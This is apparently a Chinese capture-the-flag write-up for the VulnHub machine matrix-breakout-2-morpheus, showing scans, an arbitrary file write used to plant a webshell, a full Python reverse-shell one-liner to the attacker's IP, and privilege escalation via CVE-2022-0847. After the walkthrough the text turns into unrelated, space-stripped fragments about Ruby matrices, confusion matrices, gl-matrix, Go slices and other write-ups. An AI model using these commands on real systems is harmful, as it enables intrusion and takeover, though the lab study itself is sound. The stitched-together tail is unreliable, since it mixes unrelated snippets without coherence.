靶机地址:matrix-breakout-2-morpheus
攻击机:kali2022.3
靶机:matrix-breakout-2-morpheus
题目描述:
这是《黑客帝国突围》系列的第二部,副标题为墨菲斯:1。它的主题是对第一部黑客帝国电影的回归。你扮演三位一体,试图调查尼布甲尼撒的一台计算机,Cypher将其他人都锁在外面,这掌握着一个谜团的钥匙。
难度:中等难度
nmap -sP 192.168.70.0/24
┌──(root㉿kali)-[/home/kali/Desktop]
└─# nmap -sP 192.168.70.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-31 06:43 EST
Nmap scan report for 192.168.70.1
Host is up (0.00024s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.70.2
Host is up (0.00013s latency).
MAC Address: 00:50:56:FE:42:C8 (VMware)
Nmap scan report for 192.168.70.151
Host is up (0.00015s latency).
MAC Address: 00:0C:29:99:AE:0E (VMware)
Nmap scan report for 192.168.70.254
Host is up (0.00026s latency).
MAC Address: 00:50:56:E9:E4:7C (VMware)
Nmap scan report for 192.168.70.137
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 6.09 seconds
可以看到192.168.70.151
nmap -A -p- 192.168.70.151
┌──(root㉿kali)-[/home/kali/Desktop]
└─# nmap -A -p- 192.168.70.151
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-31 06:44 EST
Nmap scan report for 192.168.70.151
Host is up (0.00042s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
|_ 256 aa83c351786170e5b7469f07c4ba31e4 (ECDSA)
80/tcp open http Apache httpd 2.4.51 ((Debian))
|_http-title: Morpheus:1
|_http-server-header: Apache/2.4.51 (Debian)
81/tcp open http nginx 1.18.0
|_http-title: 401 Authorization Required
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Meeting Place
|_http-server-header: nginx/1.18.0
MAC Address: 00:0C:29:99:AE:0E (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
可以发现有一个80端口和一个81端口
可以发现80端口是一个网页
81端口是一个登录框
使用插件查看网站信息
查看一下robots.txt
没什么东西
┌──(root㉿kali)-[/home/kali/Desktop]
└─# dirsearch -u http://192.168.70.151/
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/.dirsearch/reports/192.168.70.151/-_23-01-31_08-33-34.txt
Error Log: /root/.dirsearch/logs/errors-23-01-31_08-33-34.log
Target: http://192.168.70.151/
[08:33:34] Starting:
[08:33:35] 403 - 279B - /.htaccess.bak1
[08:33:35] 403 - 279B - /.ht_wsr.txt
[08:33:35] 403 - 279B - /.htaccess.sample
[08:33:35] 403 - 279B - /.htaccess.save
[08:33:35] 403 - 279B - /.htaccess_extra
[08:33:35] 403 - 279B - /.htaccess_orig
[08:33:35] 403 - 279B - /.htaccessBAK
[08:33:35] 403 - 279B - /.htaccess_sc
[08:33:35] 403 - 279B - /.htaccessOLD
[08:33:35] 403 - 279B - /.htaccessOLD2
[08:33:35] 403 - 279B - /.html
[08:33:35] 403 - 279B - /.htm
[08:33:35] 403 - 279B - /.htpasswds
[08:33:35] 403 - 279B - /.httr-oauth
[08:33:35] 403 - 279B - /.htaccess.orig
[08:33:35] 403 - 279B - /.htpasswd_test
[08:33:36] 403 - 279B - /.php
[08:33:51] 200 - 348B - /index.html
[08:33:51] 301 - 321B - /javascript -> http://192.168.70.151/javascript/
[08:33:58] 200 - 47B - /robots.txt
[08:33:59] 403 - 279B - /server-status
[08:33:59] 403 - 279B - /server-status/
Task Completed
设置好字典和url就可以start了
发现了一个php文件访问看看ip/graffiti.php
这里随便写入一个'试试有没有sql注入,并且抓包,发现数据包中存在一个graffiti.txt,访问发现刚才写入得'被写入到文件中所以判断存在任意文件写入漏洞
写入一句话木马
用蚁剑连接木马
查看根目录,在根目录发现了flag1
cat /etc/*-release
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.70.137\",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'
反弹成功
上传linpeas.sh -->>点击此处下载
使用蚁剑上传脚本
加权限并且运行
监测到得漏洞信息还是挺多得,这里使用CVE-2022-0847进行提权
点击此处下载-->>>Exploit
使用蚁剑上传exp,开打
在根目录下
在root目录下
我理解RubystdlibMatrix是不可修改的,也就是说,例如。m=Matrix.zero(3,4)不会写m[0,1]=7但我非常想做...我可以用笨拙的编程来做,比如defmodify_value_in_a_matrix(matrix,row,col,newval)ary=(0...m.row_size).map{|i|m.rowi}.map(&:to_a)ary[row][col]=newvalMatrix[*ary]end...或者作弊,比如Matrix.send:[]=,0,1,7但我想知道,这一定是人们一直遇到的问题。有没有一些标准的、习惯的方法可以做到这一点,而不必使用
1.这里介绍由 sklearn.metrics.ConfusionMatrixDisplay 所给出的关于混淆矩阵的一个小例子,来进行理解混淆矩阵及如何应用混淆矩阵来对数据进行分析2.先了解混淆矩阵的一些基本信息,这里规定正类为1,负类为0TP(TruePositives):预测为1,而真实的也为1(即正类判断为正类,1判断为1)TN(TrueNegatives):预测为0,真实的也为0 (即负类判断为负类,0判断为0)FP(FalsePositives):预测为1,真实的为0 (即负类判断为正类,将0判断为了1)FN(FalseNegatives):预测为0,真实为1 (即正类
我做了什么:从这里下载主分支:https://github.com/toji/gl-matrix将src文件夹放入我的项目文件夹中。从那里包括gl-matrix-manifest.js。试过这个:varmvMatrix=mat4.create();结果:varmvMatrix=mat4.create();ReferenceError:mat4isnotdefined好吧,我们直接引入mat4。包括。结果:varout=newGLMAT_ARRAY_TYPE(16);ReferenceError:GLMAT_ARRAY_TYPEisnotdefined好吧,也许它需要common.js:
GainPower识别目标主机IP地址(kali㉿kali)-[~/Vulnhub/Gainpower]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:192.168.56.0/24|ScreenView:UniqueHosts3CapturedARPReq/Reppackets,from3hosts.Totalsize:180_____________________________________________________________________________IPAtMACAddressCountLenM
我正在通过DistanceMatrixAPI使用“duration_in_traffic”和“duration”功能。对于给定的坐标对,我看到以下结果:{"destination_addresses":["Hamburg,Germany"],"origin_addresses":["85748Garching,Germany"],"rows":[{"elements":[{"distance":{"text":"761km","value":760831},"duration":{"text":"7hours1min","value":25242},"duration_in_traff
我有这段代码:functionsetupWebGL(){gl.clearColor(0.1,0.5,0.1,1.0);gl.clear(gl.COLOR_BUFFER_BIT);gl.viewport(0,0,400,300);mat4.perspective(45,400/300,0.1,100.0,pMatrix);mat4.identity(mvMatrix);mat4.translate(mvMatrix,[0,0,-2.0]);}除了最后一行,代码中的所有内容都运行mat4.translate(mvMatrix,[0,0,-2.0]);我知道这一点是因为我在每一行之后都放置了
例如:[][]float64{{11,5,14,1},{11,5,14,1}}具有维度[2,4]。如果将其传递给函数,那么在这里找到维度的最有效方法是什么?谢谢 最佳答案 外部维度只是len(x),其中x是您传递给函数的slice的slice(您的示例[][]float64{{11,5,14,1},{11,5,14,1}})。但是,不能保证内部尺寸相等,因此您必须遍历每个元素并检查它们的len值。如果你保证x的每个元素都有相同数量的元素,只要找到len(x[0])iflen(x)>0。
b站课程视频链接:https://www.bilibili.com/video/BV19x411X7C6?p=1腾讯课堂(最新,但是要花钱,我花99元😢😢买了,感觉不错):https://ke.qq.com/course/3707827#term_id=103855009 本笔记前面的笔记参照b站视频,后面的笔记参考了付费视频笔记顺序做了些调整【个人感觉逻辑顺畅】,并删掉一些不重要的内容,以及补充了个人理解系列笔记目录【持续更新】:https://blog.csdn.net/weixin_42214698/category_11393896.html文章目录1.矩阵(1)创建矩阵(2)给矩阵的
GearofWar识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Gearofwar]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:Finished!|ScreenView:UniqueHosts3CapturedARPReq/Reppackets,from3hosts.Totalsize:180_____________________________________________________________________________IPAtMACAddressCountLenMACVen
我一直在寻找一种将JSON对象转换为动态对象的简洁方法。(我可以转换为一个对象,但TwitterStreamingAPI实际上发送了两个不同的JSON对象,并且有可能是future的对象类型!)我目前使用的代码来自:DeserializeJSONintoC#dynamicobject?但这不是最干净的代码,我在玩WebMatrix时注意到它们有一个很好的JSON.Decode(string)和JSON.Encode(object)方法,我想利用它们。http://msdn.microsoft.com/en-us/library/system.web.helpers.json(v=vs.